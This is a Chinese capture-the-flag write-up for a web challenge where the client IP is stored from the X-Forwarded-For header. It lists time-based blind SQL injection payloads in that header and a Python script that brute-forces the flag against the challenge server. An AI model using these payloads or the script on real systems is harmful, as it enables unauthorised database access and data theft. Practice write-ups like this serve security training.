zoukankan      html  css  js  c++  java

  • who are you?----Writeup

    原题查看:http://ctf5.shiyanbar.com/web/wonderkun/index.php

    记录了ip

    顺势想到可能是X-Forwarded-For的问题

    又因为题目提示记录到db中去

    就可以想到应该是注入

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when (length(database())=4) then sleep(2) else sleep(0) end))lzRG) and '1'='1

    可以看到裤名是4位

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when (database() like 'web1') then sleep(2) else sleep(0) end))lzRG) and '1'='1
    这里可以得到数据库名web1

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(*) from flag)>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    这里可以得到数据库的表名

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag)>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    这里可以得到数据库的列名

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag)>1) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    这里没有延时,可以判断只有一条数据

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select length(flag) from flag )=32) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    这里可以得到flag的长度

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag where flag like "%")>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    这里就开始写个脚本爆破

    #!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import time

payloads='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'    #mysql like不区分大小写

flag = ""
print 'Start to retrive flag:'
for i in range(32):
    for payload in payloads:
        starttime=time.time()
        url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

        headers = { "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour",
            "Connection": "keep-alive",
            "X-FORWARDED-FOR": "127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag where flag like '"+flag+payload+"%')>0) then sleep(5) else sleep(0) end))lzRG) and '1'='1"
            }

        res = requests.get(url, headers=headers)
        if time.time() - starttime > 5:
            starttime2=time.time()
            res = requests.get(url, headers=headers)
            if time.time() - starttime > 5:
                flag+=payload
                print '
 database is:',flag,
                break
        else:
            print '.',
print '
[Done] current database is %s' %flag

    最后得到flag
  • 相关阅读:
    lr文件下载脚本(文件参数化重命名)
    Loadrunner之文件的下载(八)
    Loadrunner之脚本的思考时间(固定/随机)设置、调试、保存、测试服务器监控等(六)
    Loadrunner VuGen实战---事务、检查点、集合点、关联(四)
    NodeJS之Url的使用
    Http服务端
    NodeJs之文件合并(某一文件的内容发生变化与之相关的内容重新合并)
    NodeJs之项目构建(对文件及文件夹的操作)
    NodeJs初步
    Java 8中你可能没听过的10个新特性
  • 原文地址:https://www.cnblogs.com/wh4am1/p/7229121.html
Copyright © 2011-2022 走看看